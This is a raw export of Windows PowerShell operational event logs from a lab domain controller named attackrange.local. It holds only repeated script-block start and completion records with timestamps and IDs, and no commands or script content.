Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467455
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467454
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467453
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467452
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467451
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467450
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467449
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467448
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467447
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467446
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467445
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467444
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467443
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467442
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467441
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467706
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467705
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467704
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467703
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467702
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467701
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467700
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467699
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467698
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467697
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467696
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467695
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467694
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467693
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467692
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467691
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467690
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467689
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467688
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467687
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467686
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467685
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467684
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467683
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467682
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467681
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467680
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467679
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467678
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467677
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467676
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467675
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467674
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467673
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467672
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467671
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467670
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467669
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467668
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467667
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467666
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
